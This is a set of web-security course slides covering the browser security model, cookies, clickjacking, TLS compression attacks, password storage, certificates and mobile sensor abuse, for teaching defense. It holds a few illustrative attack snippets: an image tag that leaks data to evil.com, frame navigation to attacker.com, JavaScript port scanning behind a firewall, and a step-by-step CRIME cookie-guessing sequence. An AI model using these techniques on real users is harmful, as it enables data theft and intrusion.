XCS110 All Slides


INTRODUCTION

TO WEB SECURITY

John Mitchell
Dan Boneh
MODULE 2
HTTP
Rendering the Content
Isolation
Navigation
Communication
Client State
Click-Jacking
Frame Busting
Introduction
Module 2: Web Background
and the Browser Security Model
Reported Web Vulnerabilities "In the Wild"

Data from aggregator and validator of NVD-reported vulnerabilities


Chart: web vs. system vulnerabilities over time (XSS peak; decline in % web vulnerabilities since 2009)
§ 49% in 2010 -> 37% in 2011.
§ Big decline in SQL Injection vulnerabilities
Web application vulnerabilities
Chart: Web Application Vulnerabilities as a Percentage of All Disclosures. 2010: Web Applications 49%, Others 51%. 2011 H1: Web Applications 37%, Others 63%.
Web Security Challenge
Diagram: a user's browser talks over the network to a good server (which prompts "Enter password?") and to a bad server; a server can also operate as a client to other servers.
How can honest users safely interact with well-intentioned sites, while still freely browsing the web (search, shopping, etc.)?
Goals of web security
Safely browse the web
§ Users should be able to visit a variety of web sites, without incurring harm:
› No stolen information (without user’s permission)
› Site A cannot compromise session at Site B
Support secure web applications
§ Applications delivered over the web should have the same security properties we
require for stand-alone applications
And
§ Since many mobile apps are interfaces to web sites,
§ Support security for mobile apps.
Web Threat Models
Web attacker
§ Control attacker.com
§ Can obtain SSL/TLS certificate for attacker.com
§ User visits attacker.com
› Or: runs attacker’s Facebook app
Network attacker
§ Passive: Wireless eavesdropper
§ Active: Evil router, DNS poisoning
Malware attacker
§ Attacker escapes browser isolation mechanisms and runs
separately under control of OS
Outline
§ Web security goals and threat models
§ HTTP
§ Rendering: Html, DOM, embedded content, JavaScript
§ Isolation: frames, same-origin policy, HTML5 sandboxing
§ Communication: fragment, post-message, cross-origin request
§ Frame navigation: Same-origin policy, descendant policy
§ Client storage: Cookies, Local storage, Native Client
§ Click-jacking, tap-jacking, frame busting
HTTP
Module 2: Web Background
and the Browser Security Model
Uniform Resource Locator (URL)

Global identifier of network-retrievable content

Example: http://stanford.edu:81/class?name=cs155#homework
§ Protocol: http
§ Hostname: stanford.edu
§ Port: 81
§ Path: /class
§ Query: name=cs155
§ Fragment: homework

Special characters are encoded as hex:


§ %0A = newline
§ %20 or + = space, %2B = + (special exception)
HTTP Request
Request line: Method, File, HTTP version; then headers, a blank line, then data (none for GET)

GET /index.html HTTP/1.1
Accept: image/gif, image/x-bitmap, image/jpeg, */*
Accept-Language: en
Connection: Keep-Alive
User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)
Host: www.example.com
Referer: http://www.google.com?q=dingbats

GET: no side effect; POST: possible side effect


HTTP Response
Status line: HTTP version, Status code, Reason phrase; then headers, a blank line, then data

HTTP/1.0 200 OK
Date: Sun, 21 Apr 1996 02:20:42 GMT
Server: Microsoft-Internet-Information-Server/5.0
Connection: keep-alive
Content-Type: text/html
Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT
Set-Cookie: …
Content-Length: 2543

<HTML> Some data... blah, blah, blah </HTML>

Cookies
Rendering Content
Module 2: Web Background
and the Browser Security Model
Rendering content
Browser execution model
Each browser window or frame
§ Loads content
§ Renders it
› Processes HTML and scripts to display page
› May involve images, subframes, etc.
§ Responds to events
Events can be
§ User actions: OnClick, OnMouseover
§ Rendering: OnLoad, OnBeforeUnload
§ Timing: setTimeout(), clearTimeout()
Example page source (washingtonpost.com, 2013):
<head>
<title>Washington Post: Breaking News, World, US, DC News .. Analysis</title>
...
</head>
<body class="eidos homepage sectionfront">
<script type="text/javascript">
if(self!==top&&!(top.window.location.pathname).startsWith('/PortalEditor')){top.location=self.location;}
</script>
...
<h2 class="headline"><a href="/world/national-security/nsa-gathered-thousands-of-americans-e-mails-before-court-struck-down-program/2013/08/21/146ba4b6-0a90-11e3-b87c-476db8ac34cd_story.html">
Secret court: <br>NSA gathered thousands of domestic e-mails</a>
...
<p class="byline">Ellen Nakashima&#32…</p>
<p class="">
The program unlawfully gathered as many as tens of thousands of e-mails,
according to a 2011 opinion.</p>
...
<div class="hide"><img class="" src="http://ad.doubleclick.net/ad/N4359.washingtonpost.com/B7241351.19;sz=1x1;ord=[timestamp]?" width="1" height="1" border="0" style="display: inline-block; "></div>
...
Share this video:
...
<a class="facebook_static" onclick="TWP.Module.SocialButtons.staticSocialPopup('http://www.facebook.com/sharer.php?u=http://www.washingtonpost.com/posttv/video/thefold/tonight-on-the-fold-august-21-2013/2013/08/21/36ed282c-0a98-11e3-9941-6711ed662e71_video.html%3Ffb_ref%3Dsm_btn_fb')">
...
Document Object Model (DOM)
Object-oriented interface used to read and write docs
§ web page in HTML is structured data
§ DOM provides representation of this hierarchy

Examples
§ Properties: document.alinkColor, document.URL,
document.forms[ ], document.links[ ], document.anchors[ ]
§ Methods: document.write(document.referrer)

Includes Browser Object Model (BOM)
§ window, document, frames[], history, location, navigator (type and version of browser)
Changing HTML using Script, DOM
Some possibilities
§ createElement(elementName)
§ createTextNode(text)
§ appendChild(newChild)
§ removeChild(node)
HTML:
<ul id="t1">
<li> Item 1 </li>
</ul>

Example: Add a new list item:

var text = 'Item 2'  // text of the new item
var list = document.getElementById('t1')
var newitem = document.createElement('li')
var newtext = document.createTextNode(text)
list.appendChild(newitem)
newitem.appendChild(newtext)
Basic web functionality
HTML Image Tags

<html>
<p> … </p>
<img src="http://example.com/sunset.gif" height="50" width="100">
</html>

Displays this nice picture (shown on the slide)

Security issues?
Security consequences

Image tag security issues


Communicate with other sites
§ <img src="http://evil.com/pass-local-information.jpg?extra_information">
Hide resulting image
§ <img src=" … " height="1" width="1">
Spoof other sites
§ Add logos that fool a user

Important Point: A web page can send information to any site


Basic web functionality
JavaScript onError
Basic function
§ Triggered when error occurs loading a document or an image
Example

<img src="image.gif" onerror="alert('The image could not be loaded.')">

§ Runs onError handler if image does not exist and cannot load

http://www.w3schools.com/jsref/jsref_onError.asp
Basic web functionality
JavaScript timing
Sample code
<html><body><img id="test" style="display: none">
<script>
var test = document.getElementById('test');
var start = new Date();
test.onerror = function() {
var end = new Date();
alert("Total time: " + (end - start));
}
test.src = "http://www.example.com/page.html";
</script>
</body></html>

§ When response header indicates that page is not an image, the browser
stops and notifies JavaScript via the onerror handler.
Basic web functionality
Port scanning behind firewall
JavaScript can:
§ Request images from internal IP addresses
› Example: <img src="192.168.0.4:8080"/>
§ Use timeout/onError to determine success/failure
§ Fingerprint webapps using known image names

Diagram: 1) the user asks the malicious server "show me dancing pigs!"; 2) the server answers "check this out" with a web page; the page, running in the browser, scans hosts behind the firewall; 3) the port scan results are sent back to the server.
Remote scripting
Goal
§ Exchange data between a client-side app running in a browser and server-side app, without reloading page
Methods
§ Java Applet/ActiveX control/Flash
› Can make HTTP requests and interact with client-side JavaScript code, but requires LiveConnect (not available on all browsers)
§ XML-RPC
› open, standards-based technology that requires XML-RPC libraries on server and in your client-side code.
§ Simple HTTP via a hidden IFRAME
› IFRAME with a script on your web server (or database of static HTML files) is by far the easiest of the three remote scripting options

Important Point: A web site can maintain bi-directional communication with the browser (until user closes/quits)

See: http://developer.apple.com/internet/webcontent/iframe.html
Simple remote scripting example
client.html: RPC by passing arguments to server.html in query string

<script type="text/javascript">
function handleResponse() {
alert('this function is called from server.html') }
</script>
<iframe id="RSIFrame" name="RSIFrame"
style="width:0px; height:0px; border: 0px"
src="blank.html">
</iframe>
<a href="server.html" target="RSIFrame">make RPC call</a>

server.html: another page on same server, could be server.php, etc

<script type="text/javascript">
window.parent.handleResponse()
</script>

RPC can be done silently in JavaScript, passing and receiving arguments


Isolation
Module 2: Web Background
and the Browser Security Model
Frame and iFrame
Window may contain frames from different sources
§ Frame: rigid division as part of frameset
§ iFrame: floating inline frame
iFrame example
<iframe src="hello.html" width=450 height=100>
If you can see this, your browser doesn't understand IFRAME.
</iframe>

Why use frames?


§ Delegate screen area to content from another source
§ Browser provides isolation based on frames
§ Parent may work even if frame is broken
Windows Interact

Analogy
Operating system
§ Primitives: System calls; Processes; Disk
§ Principals: Users
§ Discretionary access control
§ Vulnerabilities: Buffer overflow; Root exploit; …
Web browser
§ Primitives: Document object model; Frames; Cookies / localStorage
§ Principals: “Origins”
§ Mandatory access control
§ Vulnerabilities: Cross-site scripting; Cross-site request forgery; Cache history attacks; …
Browser security mechanism

Diagram: one page containing frames from origins A and B.

Each frame of a page has an origin
§ Origin = protocol://host:port
Frame can access its own origin
§ Network access, Read/write DOM, Storage (cookies)
Frame cannot access data associated with a different origin
Components of browser security policy
Frame-Frame relationships
§ canScript(A,B)
› Can Frame A execute a script that manipulates arbitrary/nontrivial DOM elements of Frame B?
§ canNavigate(A,B)
› Can Frame A change the origin of content for Frame B?
Frame-principal relationships
§ readCookie(A,S), writeCookie(A,S)
› Can Frame A read/write cookies from site S?
Library import excluded from SOP

<script src=https://seal.verisign.com/getseal?host_name=a.com></script>

• Script has privileges of imported page, NOT source server.
• Can script other pages in this origin, load more scripts
• Same issues with other forms of importing
Domain Relaxation
Diagram: frames from www.facebook.com and chat.facebook.com start as different origins; after each sets document.domain to facebook.com, both share the origin facebook.com.

Origin: scheme, host, (port), hasSetDomain

Try document.domain = document.domain
HTML5 Frame sandbox
Specify sandbox attribute of iframe
<iframe sandbox src="http://untrusted.site.net/content"></iframe>
Creates restricted frame
§ Plugins are disabled. Any kind of ActiveX, Flash, or Silverlight plugin will not be
executed.
§ Forms are disabled. The hosted content is not allowed to post forms back to any target.
§ Scripts are disabled. JavaScript is disabled and will not execute.
§ Links to other browsing contexts are disabled. An anchor tag targeting different browser
levels will not execute.
§ Unique origin treatment. All content is treated under a unique origin. The content is not
able to traverse the DOM or read cookie information.
Optional attributes relax sandbox
allow-forms
§ Allows embedded page to post back using a form submit within the frame.
allow-scripts
§ Enables JavaScript
allow-same-origin
§ Can access DOM of another frame, subject to same-origin policy
§ Only useful with allow-scripts
§ But be careful: parent frame can manipulate sandbox attributes and remove further
restrictions.
allow-top-navigation
§ Allow content to navigate entire tab/window
allow-popups
§ Allow embedded content to open new popup windows
Navigation
Module 2: Web Background
and the Browser Security Model
Guninski Attack
Diagram: a page holds a frame named awglogin; another page runs:
window.open("https://attacker.com/", "awglogin");
What should the policy be?
Diagram labels: Sibling, Frame Bust, Child, Descendant
Legacy Browser Behavior
Browser: Policy
§ IE 6 (default): Permissive
§ IE 6 (option): Child
§ IE7 (no Flash): Descendant
§ IE7 (with Flash): Permissive
§ Firefox 2: Window
§ Safari 3: Permissive
§ Opera 9: Window
§ HTML 5: Child
Window Policy Anomaly

top.frames[1].location = "http://www.attacker.com/...";
top.frames[2].location = "http://www.attacker.com/...";
...
Adoption of Descendant Policy
Browser: Policy
§ IE7 (no Flash): Descendant
§ IE7 (with Flash): Descendant
§ Firefox 3: Descendant
§ Safari 3: Descendant
§ Opera 9: (many policies)
§ HTML 5: Descendant
Communication
Module 2: Web Background
and the Browser Security Model
Fragment Identifier Messaging

Send information by navigating a frame
§ http://gadget.com/#hello
Navigating to fragment doesn’t reload frame
§ No network traffic, but frame can read its fragment
Not a secure channel
§ Confidentiality: yes
§ Integrity: yes
§ Authentication: no
window.postMessage
API for inter-frame communication
§ Supported in current browsers
§ A network-like channel between frames
Diagram: a page with two gadgets, "Add a contact" and "Share contacts".
postMessage syntax

frames[0].postMessage("Attack at dawn!", "http://b.com/");

window.addEventListener("message", function (e) {
if (e.origin == "http://a.com") {
... e.data ... }
}, false);

Diagram: the message "Attack at dawn!" delivered to the frame.
Facebook Anecdote
Why include “targetOrigin”?
What goes wrong?

frames[0].postMessage("Attack at dawn!");

Messages sent to frames, not principals
§ When would this happen?
Two-way communication
A method call is associated with a response
Can build this on top of postMessage
§ Messenger: Each time you call a method in the iframe, you pass a reply function that is
called with the results of that method call.
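The following request/reply messenger over postMessage is an added example, not code from the slides or from the Messenger or jQuery plugin named above. It enforces both checks the slides call out, an explicit targetOrigin on send and an e.origin check on receive, and matches each call to its reply function by id; FakeWindow is an assumed in-memory model of a browser window's postMessage delivery so the logic runs in Node.

```javascript
// Added example: request/reply messaging over postMessage with origin checks.
// FakeWindow is a constructed stand-in for a browser window so this runs in Node;
// in a page, `self` and `peer` would be window and the iframe's contentWindow.
class FakeWindow {
  constructor(origin) {
    this.origin = origin;     // origin of the document currently loaded in this window
    this.listeners = [];
  }
  addEventListener(type, fn) {
    if (type === 'message') this.listeners.push(fn);
  }
  // Models window.postMessage(message, targetOrigin): the browser delivers the
  // message only if targetOrigin is "*" or matches the window's current origin.
  postMessage(message, targetOrigin, sourceWindow) {
    if (targetOrigin !== '*' && targetOrigin !== this.origin) return false;
    const event = { origin: sourceWindow.origin, data: message, source: sourceWindow };
    for (const fn of this.listeners) fn(event);
    return true;
  }
}

// Messenger: call a named method in the peer window and receive the result via a
// reply function. Requests and replies are matched by id.
class Messenger {
  constructor(self, peer, peerOrigin) {
    this.self = self;
    this.peer = peer;
    this.peerOrigin = peerOrigin;  // the only principal we will talk to
    this.methods = new Map();
    this.pending = new Map();      // id -> reply function
    this.nextId = 1;
    this.rejected = 0;             // messages dropped because e.origin did not match
    self.addEventListener('message', (e) => this.onMessage(e));
  }
  expose(name, fn) { this.methods.set(name, fn); }
  call(method, args, reply) {
    const id = this.nextId++;
    this.pending.set(id, reply);
    // Explicit targetOrigin: if the frame has since been navigated elsewhere,
    // the browser drops the message instead of handing it to whoever is there now.
    return this.peer.postMessage({ kind: 'call', id, method, args }, this.peerOrigin, this.self);
  }
  onMessage(e) {
    // Messages are delivered to frames, not principals: check who actually sent it.
    if (e.origin !== this.peerOrigin) { this.rejected++; return; }
    const msg = e.data;
    if (msg.kind === 'call') {
      const fn = this.methods.get(msg.method);
      const result = fn ? fn(...msg.args) : null;
      e.source.postMessage({ kind: 'reply', id: msg.id, result }, e.origin, this.self);
    } else if (msg.kind === 'reply' && this.pending.has(msg.id)) {
      const reply = this.pending.get(msg.id);
      this.pending.delete(msg.id);
      reply(msg.result);
    }
  }
}

// Walk through the slides' scenario: page a.com talks to a contacts gadget from b.com.
function demo() {
  const a = new FakeWindow('http://a.com');      // top page
  const b = new FakeWindow('http://b.com');      // gadget in frames[0]
  const evil = new FakeWindow('http://evil.com');
  const pageSide = new Messenger(a, b, 'http://b.com');
  const gadgetSide = new Messenger(b, a, 'http://a.com');
  gadgetSide.expose('addContact', (name) => `added ${name}`);

  const out = {};
  pageSide.call('addContact', ['Alice'], (result) => { out.reply = result; });

  // A third-party window injects a forged call into the gadget's frame (targetOrigin "*").
  b.postMessage({ kind: 'call', id: 99, method: 'addContact', args: ['Mallory'] }, '*', evil);
  out.forgedRejected = gadgetSide.rejected;

  // The gadget frame gets navigated to evil.com; a.com's next call is not delivered.
  b.origin = 'http://evil.com';
  out.deliveredAfterNavigation = pageSide.call('addContact', ['Bob'], () => {});
  return out;
}
```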
jQuery postMessage plugin
Wraps the postMessage API and simplifies its usage.
Works in browsers that do not support postMessage method by using fragment
navigation (hash portion of the url)
Network communication
Diagram: Site A context and Site B context in the browser, each talking to its own site, with cross-origin network requests between them.

Cross-origin network requests
Access-Control-Allow-Origin: <list of domains>
Access-Control-Allow-Origin: *
Client State
Module 2: Web Background
and the Browser Security Model
Cookies
Used to store state on user’s machine

Server → Browser (in response to POST …), HTTP header:
Set-cookie: NAME=VALUE ;
domain = (who can read) ;
expires = (when expires) ;
secure = (only over SSL)
If expires=NULL: this session only

Browser → Server (GET …):
Cookie: NAME = VALUE

HTTP is stateless protocol; cookies add state


Cookie authentication
Sequence (Browser, Web Server, Auth server):
1. Browser → Web Server: POST login.cgi with Username & pwd
2. Web Server → Auth server: Validate user; Auth server returns auth=val and stores val
3. Web Server → Browser: Set-cookie: auth=val
4. Browser → Web Server: GET restricted.html with Cookie: auth=val
5. Web Server → Auth server: auth=val; Auth server checks val and answers YES/NO
6. If YES, Web Server → Browser: restricted.html
Cookie Security Policy

Uses:
§ User authentication
§ Personalization
§ User tracking: e.g. Doubleclick (3rd party cookies)

Origin is the tuple <domain, path>


§ Can set cookies valid across a domain suffix
§ Complicated and implementation-specific rules for selecting
cookie values, when many cookies apply
Secure Cookies

Server → Browser (response to GET …), HTTP header:
Set-cookie: NAME=VALUE ;
Secure=true

• Provides confidentiality against network attacker
• Browser will only send cookie back over HTTPS
• … but no integrity
• Can rewrite secure cookies over HTTP
⇒ network attacker can rewrite secure cookies
⇒ can log user into attacker’s account
httpOnly Cookies

Server → Browser (response to GET …), HTTP header:
Set-cookie: NAME=VALUE ;
httpOnly

• Cookie sent over HTTP(s), but not accessible to scripts
• cannot be read via document.cookie
• Helps prevent cookie theft via XSS
… but does not stop most other risks of XSS bugs
HTML5 Local Storage
Based on named key/value pairs
§ Store data based on a named key (a string)
§ Retrieve that data with the same key
§ Data can be any type supported by JavaScript
› Including strings, Booleans, integers, floats
› But data is actually stored as a string
Need to use functions like parseInt() or parseFloat() to coerce your retrieved data into the
expected JavaScript datatype
Some browsers also implement Web SQL Database
§ Other forms of local storage would also be useful
Example

Save a sentence in Local Storage :

localStorage.setItem(1,'This is a sample sentence');

Retrieve it:

var data = localStorage.getItem(1);

Local Storage supports length, removeItem() and clear().


Security issues

Storage per origin


§ Origin is: scheme, host, port
Could be accessed by user with local access (varies by browser)
Can be accessed by JavaScript in page
§ no httpOnly so vulnerable to XSS attacks
XSS attacks can read local storage
§ Do not store sensitive information
XSS attacks can write local storage
§ Do not trust data read from local storage
Native Client
Sandboxed native code
Sandbox techniques
Static analysis
§ No loads or stores permitted outside the data sandbox
› Enforced by operating system protection mechanisms
§ No unsafe instructions
› Examples: syscall, int, and lds.
§ Control flow integrity
› All direct, indirect branches target a safe instruction
Dynamic monitoring
§ Native Client runtime mediates system calls
Click-Jacking
Module 2: Web Background
and the Browser Security Model

Clickjacking

Attacker overlays multiple transparent or opaque frames to


trick a user into clicking on a button or link on another page

Clicks meant for the visible page are hijacked and routed to
another, invisible page

Clickjacking in the Wild


Google search for “clickjacking” returns 342,000 results… this is not a hypothetical
threat!
Summer 2010: Facebook worm superimposes an invisible iframe over the entire page
that links back to the victim's Facebook page
§ If victim is logged in, automatically recommends link to new friends as soon as the
page is clicked on
Many clickjacking attacks against Twitter
§ Users send out tweets against their will
Tap-jacking
Frame Busting
Module 2: Web Background
and the Browser Security Model
Frames

Embed HTML documents in other documents

<iframe name="myframe" src="http://www.google.com/">
This text is ignored by most browsers.
</iframe>
Frame Busting

Goal: prevent web page from loading in a frame


§ example: opening login page in a frame will display
correct passmark image

Frame busting:

if (top != self)
top.location.href = location.href
Better Frame Busting

Problem: JavaScript OnUnload event

<body onUnload="javascript: cause_an_abort;">

Try this instead:

if (top != self)
top.location.href = location.href
else { … code of page here … }
Summary
• Web security goals and threat models
• HTTP
• Rendering: Html, DOM, embedded content, JavaScript
• Isolation: frames, same-origin policy, HTML5 sandboxing
• Communication: fragment, post-message, cross-origin request
• Frame navigation: Same-origin policy, descendant policy
• Client storage: Cookies, Local storage, Native Client
• Click-jacking, tap-jacking, frame busting
MODULE 3
TLS 1.3
Compression attacks
Password Breaches
Certificates on the Web
Abusing Mobile Sensors
Topics for this section
TLS attacks and defenses:
Compression attacks: CRIME and BREACH, TLS 1.3

Password breaches and 2nd factor authentication

Certificate Authorities: compromises, Lets encrypt, universal TLS

New hardware security support: Intel SGX

Sensor abuse on mobile phones


TLS 1.3
Module 3: Attacks and Defenses
Review: TLS 1.2
Diagram: browser ↔ server; the server holds a certificate from a CA and its secret key SK.
browser → server: client-hello
server → browser: server-hello + server-cert (PK)
key exchange (several options); most common: browser picks random k and sends client-key-exchange: E(PK, k); server recovers k
Finished
HTTP data encrypted with KDF(k)

most common: server authentication only

Review: TLS record encryption (original design)
Diagram: browser ↔ server, both holding key k. Plaintext HTTP data is split into 16KB records; for each record: compute the integrity tag (MAC) over the plaintext, append it, encrypt plaintext || tag with k, and send hdr || ciphertext.

encryption method is called MAC-then-encrypt : why?
the reason for many attacks on TLS (BEAST, Lucky13, POODLE, … )
TLS 1.3: a new version of TLS (2017)
Record encryption:
• mandatory method: AES128-GCM
  fast on x86 (AES-NI) : Intel Skylake, 0.68 cycles/byte
• On weaker processors: CHACHA20_POLY1305
  fast in software
Both methods provide authenticated encryption
TLS 1.3: a new version of TLS (2017)
Session setup:
• Forward secrecy required (non-forward secure method is deprecated)
• Zero round-trip setup option:
  client can send encrypted data on first flow (after client-hello)
• Server certificate is encrypted (previously, sent in the clear)
  stronger privacy when server has multiple certificates
• Initiate TLS session from a pre-shared secret, if one exists
  more general than session-resume in TLS 1.2
Compression
Attacks
Module 3: Attacks and Defenses
Compression and Encryption
Strong desire to combine compression and encryption

How?

Option 1: first encrypt and then compress

Does not work … ciphertext looks like a random string


Compression and Encryption
Option 2: first compress and then encrypt
Used in many Internet protocols (TLS, HTTPS, QUIC, …)

POST /bank.com/buy?id=aapl
Cookie: uid=JhPL8g69684rksfsdg

Recall in TLS: 16KB records


Support for compression before encryption
Trouble … [Kelsey’02]

Compress-then-encrypt reveals information:

POST /bank.com/buy?id=aapl
Cookie: uid=JhPL8g69684rksfsdg

POST /bank.com/buy?id=goog
Cookie: uid=JhPL8g69684rksfsdg

Second message compresses better than first:


network observer can distinguish the two messages!
Even worse: the CRIME attack [RD’2012]
(simplified)

POST /bank.com/buy?id=aapl
Cookie: uid=JhPL8g69684rksfsdg
Host: bank.com

Javascript
Goal: steal user’s bank cookie
Javascript can issue requests to Bank,
but cannot read Cookie value
Even worse: the CRIME attack [RD’2012] (simplified)
Each try: a request carrying a guess in the query string is compressed together with the Cookie in one 16KB record; the attacker observes the ciphertext size.

POST /bank.com/buy?uid=A11111…
Cookie: uid=JhPL8g69684rksfsdg
Host: bank.com
Observe ciphertext size

POST /bank.com/buy?uid=B11111…
Cookie: uid=JhPL8g69684rksfsdg
Host: bank.com
Observe ciphertext size

…

POST /bank.com/buy?uid=J11111…
Cookie: uid=JhPL8g69684rksfsdg
Host: bank.com
Ciphertext size is slightly shorter
⇒ first character of Cookie is “J”

POST /bank.com/buy?uid=Ja1111…
Cookie: uid=JhPL8g69684rksfsdg
Host: bank.com
Observe ciphertext size

…

POST /bank.com/buy?uid=Jh1111…
Cookie: uid=JhPL8g69684rksfsdg
Host: bank.com
Ciphertext size is slightly shorter
⇒ 2nd character of Cookie is “h”

Recover entire cookie after 256 × (len of Cookie) attempts
Takes several seconds (simplified)
What to do?
The problem:
Observed ciphertext length reveals compression amount ⇒
reveals plaintext info … no good solution

Non-defense: add a random length pad to ciphertext

First defense: compression disabled in TLS (and others, e.g., SPDY)

Problem: compression also done in HTTP layer


⇒ BREACH attack [PHG’13]
… much harder to disable HTTP compression in practice
What to do? [PHG’13]

Many web sites are impacted …

A proposed defense:

› Application layer “tags” sensitive data fields in HTTP requests and responses (cookies, PII, etc.)
› HTTP-level compression only applied to non-sensitive fields

… but not easy to implement


Password
Breaches
Module 3: Attacks and Defenses
A (small) sample of password breaches
(server-side compromise)
2012: Linked-in: 6 million passwords (hashed, unsalted)
2013:
Twitter: 250,000 passwords (hashed, salted)
Evernote: 50 million records: usernames, emails, hashed passwords
Adobe: 38 million records
email addrs., password hints, and encrypted passwords
2015:
LastPass: stolen email addr., hashed master passwords (and salts)
Weak password choice
Users frequently choose weak passwords: (adobe list, 2013)

Password: 123456 123456789 password adobe123 12345678 qwerty 1234567

A common occurrence
Example: the Rockyou password list (2009), fraction of users choosing one of the 6 most common passwords (123456, 12345, Password, iloveyou, princess, abc123); fractions shown on the chart: 5%, 1.1%, 0.9%, 0.5%, 0.5%, 0.5%, 0.3%; total: 8.8%

List of 360,000,000 words covers about 25% of user passwords
How to store passwords
First rule of password storage: never store passwords in the clear !

password database (columns: id, salt, hash):
Alice   SA   H(pwA , SA)
Bob     SB   H(pwB , SB)
…       …    …

Alice sends pwA; to validate a given password server checks:
H(pwA , SA) ≟ StoredHash(Alice)
How to hash?
Linked-in: SHA-1 hashed (unsalted) passwords
⇒ 6 days, 90% of pwds. recovered by exhaustive search
The problem: SHA-1 is too fast …
attacker can try all words in dictionary

To hash passwords:

• Use a keyed hash function (e.g., HMAC) where key stored in HSM

• In addition: use a slow, space-hard function


How to hash?
PBKDF2, bcrypt: slow hash functions
• Slowness by “iterating” a crypto hash function like SHA256
• Parameterized number of iterations (e.g., set for 1000 evals/sec)

Problem: custom hardware (e.g., GPU) can evaluate hash function much faster than a commodity CPU
⇒ attacker can do dictionary attack much faster than 1000 evals/sec.
Why is custom hardware faster?
Bar chart comparing hashing throughput: Intel Skylake x86 CPU (93 on the chart; only a small part of the CPU is used to hash) vs. Antminer S7, custom hardware for Bitcoin mining ($1,695; 5.06 TH/s, 5060 on the chart); chart annotation: 50x.
How to hash?
Scrypt: a slow hash function AND need lots of memory to evaluate
⇒ custom hardware not much faster than commodity CPU

Problem: memory access pattern depends on input password


⇒ local attacker can learn memory access pattern for user’s pwd
⇒ eliminates need for memory in an offline dictionary attack

Is there a space-hard function where time is independent of pwd?


• Pwd hashing competition (2015): Argon2i (also see Balloon hashing)
Strengthening User Authentication
One option: biometrics:
Fingerprints, retina, facial recognition, …
Benefit: hard to forget

Problems:
Biometrics are not generally secret
Cannot be changed, unlike passwords

⇒ Should primarily be used as a second factor authentication (note: CCC’13)


2nd factor OTP authentication
Setup:
Choose random key k
On device and server: sk = (k,0)

Identification:
user (holds (k,0)) → server (holds (k,0)): r0 ← HMAC(k,0)
server answers yes iff r = HMAC(k,0)
both then update to (k,1); next round: r1 ← HMAC(k,1), and so on

often, time-based updates
Google authenticator
6-digit timed one-time passwords (TOTP) [RFC 6238]

Gmail, Dropbox, WordPress, …


Wide web-site adoption:
› Open study: 6.4% Gmail user adoption [EuroSec 2015]

To enable TOTP for a user: web site presents QR code with embedded data:
otpauth://totp/Example:[email protected]?secret=JBSWY3DPEHPK3PXP&issuer=Example

(Subsequent user logins require user to present TOTP)

Danger: password reset upon user lockout


Server compromise exposes secrets
March 2011:
RSA announced servers attacked, secret keys stolen
⇒ enabled SecurID user impersonation

Can we do better? Answer: Yes!


Duo (also FIDO U2F)

Signature-based challenge response:
1. user enters pwd on the login page; server looks up the user's pub-key in the user database (id, pub-key: Alice pkA, Bob pkB, …)
2. server s sends challenge: m to the user's device
3. user confirms 2FA on the device, which holds sk; Response: sign(sk, m)
4. server verifies the signature with the stored pub-key

No secrets on server, simple user experience
Certificates
on the Web
Module 3: Attacks and Defenses
Certificate Issuance Woes
Wrong issuance:
2011: Comodo and DigiNotar RAs hacked, issue certs for Gmail, Yahoo! Mail
2013: TurkTrust issued cert. for gmail.com (discovered by pinning)
2014: Indian NIC (intermediate CA trusted by the root CA IndiaCCA) issue certs
for Google and Yahoo! domains
Result: (1) India CCA revoked NIC’s intermediate certificate
(2) Chrome restricts India CCA root to only seven Indian domains
2015: MCS (intermediate CA cert issued by CNNIC) issues certs for Google
domains
Result: current CNNIC root no longer recognized by Chrome
⇒ enables eavesdropping w/o a warning on user’s session
Man in the middle attack using rogue cert
Diagram: browser ↔ attacker (holds BadguyCert) ↔ bank (holds BankCert)
browser → attacker: GET https://bank.com, ClientHello; attacker → bank: ClientHello
bank → attacker: ServerCert (Bank); attacker → browser: ServerCert (rogue: cert for Bank by a valid CA)
SSL key exchange browser–attacker yields k1; SSL key exchange attacker–bank yields k2
HTTP data enc with k1 between browser and attacker; HTTP data enc with k2 between attacker and bank

Attacker proxies data between user and bank.
Sees all traffic and can modify data at will.
What to do? (many good ideas)
HPKP: HTTP public-key pinning
§ HTTP header that lets a site declare CAs that can sign its cert
Public-Key-Pins: pin-sha256="cUPcTAZWKaASuYWhhneDttWpY3oBAkE3h2+soZS7sWs=";
§ on subsequent HTTPS, browser rejects certs issued by other CAs
§ TOFU: Trust on First Use

Certificate Transparency (CT): [LL’12]
§ idea: CA’s must advertise a log of all certs. they issued
§ Browser will only use a cert if it is on the CT log
• Efficient implementation using Merkle hash trees
• Companies can scan logs to look for invalid issuance
A new CA: Let’s encrypt (letsencrypt.org)
A new open Certificate Authority: free certs (2016: 800K certs issued)
• Provisioning via an automated agent running on web server
Step 1: install agent on web server
Step 2: agent proves domain ownership (e.g. bank.com) by DNS record under bank.com or page at fixed URI at bank.com, and sends Certificate Signing Request (CSR) to CA
Step 3: Let’s encrypt CA checks domain ownership; if valid, issues cert and sends cert to agent
Step 4: agent installs cert on Web server … done
Abusing
Mobile Sensors
Module 3: Attacks and Defenses
Sensors on smart phones
Microphone
Camera
GPS
Light sensor
Compass
MEMS Gyroscope / accelerometer
Power meter
Barometer
Heart rate / oximeter (on smart watches)
All have a specific function. Can they be abused ??
Annotation next to the power meter, barometer and heart rate entries: no user permission required
Example 1: fingerprinting
Imperfections in camera sensor can be used to link pictures taken by same phone
[LG’06]

Accelerometer gives a stable device fingerprint [BBMN’14, DRXCN’14]
§ App. can tell if it has been previously installed on device
Diagram: app ↔ device-id
Example 2: Gyrophone [MBN’14]

Phone gyroscope: measures vibrations (used for games)

Trouble:
› Gyroscope picks up air vibrations (a.k.a speech)
› Sample rate (apps.): 200Hz
› Machine learning ⇒ can recognize some speech
Example 3: Power usage sensor
Modern phones measure power drained from battery
Enables apps to optimize power use

Repeatedly read:
/sys/class/power_supply/battery/voltage_now
/sys/class/power_supply/battery/current_now

Unrestricted access.
Can this be abused?
Example 3: Power usage sensor

Can this be abused? [MBSN’15]


Observation: power used by radio depends on
distance and obstacles to cell tower
So what?
Our work: [MBSN’15]
power readings + machine learning ⇒ GPS

Why? Routes in a city have unique power fingerprints


Three goals:
✓ 1. identify route car is taking among a known set of routes
✓ 2. identify car’s location along a known route
✓ 3. identify car’s route based on a database of
pre-measured short segments
Identify location along known route
Main tool: dynamic time warping (DTW)
⇒ Aligns pre-recorded data with current samples
Lessons
Sensors can have unintended consequences
There is risk in giving apps direct access to sensors

Prevention:

• Always require permissions to access sensors

• Reduce data from sensors to min needed for utility


or only provide abstract view of sensor data
Final note: limitations of air gaps
